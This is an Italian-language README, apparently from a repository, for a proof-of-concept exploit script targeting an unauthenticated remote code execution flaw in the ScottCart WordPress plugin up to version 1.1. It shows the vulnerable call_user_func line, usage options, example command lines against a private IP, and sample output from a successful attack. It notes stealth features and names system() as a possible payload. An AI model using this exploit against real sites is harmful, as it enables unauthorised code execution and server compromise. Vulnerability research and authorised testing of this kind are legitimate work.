
ScottCart <= 1.1 - Esecuzione di codice remoto non autenticata
🔥 Script di exploit per ScottCart <= 1.1 - Esecuzione Remota di Codice non autenticata
🧑💻 Di Nxploit – Khaled Alenazi
Il plugin ScottCart per WordPress (versioni ≤ 1.1) è vulnerabile a Esecuzione Remota di Codice (RCE).
Ciò consente ad attaccanti non autenticati di eseguire funzioni PHP arbitrarie sul server tramite un endpoint AJAX vulnerabile.
Il plugin registra un'azione AJAX non protetta:
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');
Che esegue:
call_user_func($_POST['function']);
Permettendo agli attaccanti di chiamare qualsiasi funzione PHP esistente, come:
phpinfo()scottcart_get_the_user_ip()system() ← se estesa in ambienti modificatiphpinfo() per PoCresults_2025-03-26_14-33-01.txt)User-Agent personalizzato, gestione degli errori e ignoranza SSL per furtivitàusage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
ScottCart <= 1.1 - Esecuzione Remota di Codice non autenticata
Di Nxploit Khaled Alenazi.
options:
-h, --help Mostra questo messaggio di aiuto ed esci
-u URL, --url URL URL di destinazione base (es., http://192.168.100.74:888/wordpress)
-p PAYLOAD, --payload PAYLOAD
Funzione da chiamare (default: phpinfo)
phpinfo()):python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
[+] URL di destinazione: http://192.168.100.74:888/wordpress
[+] Funzione payload: phpinfo
[*] Avvio exploit...
[+] Invio payload: function=phpinfo
[+] Exploit riuscito! Output:
PHP Version => 8.1.12
...
📁 E salvato in: results_2025-03-26_14-33-01.txt
Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati.
Non utilizzarlo contro sistemi di cui non possiedi la proprietà o per i quali non hai esplicita autorizzazione al test.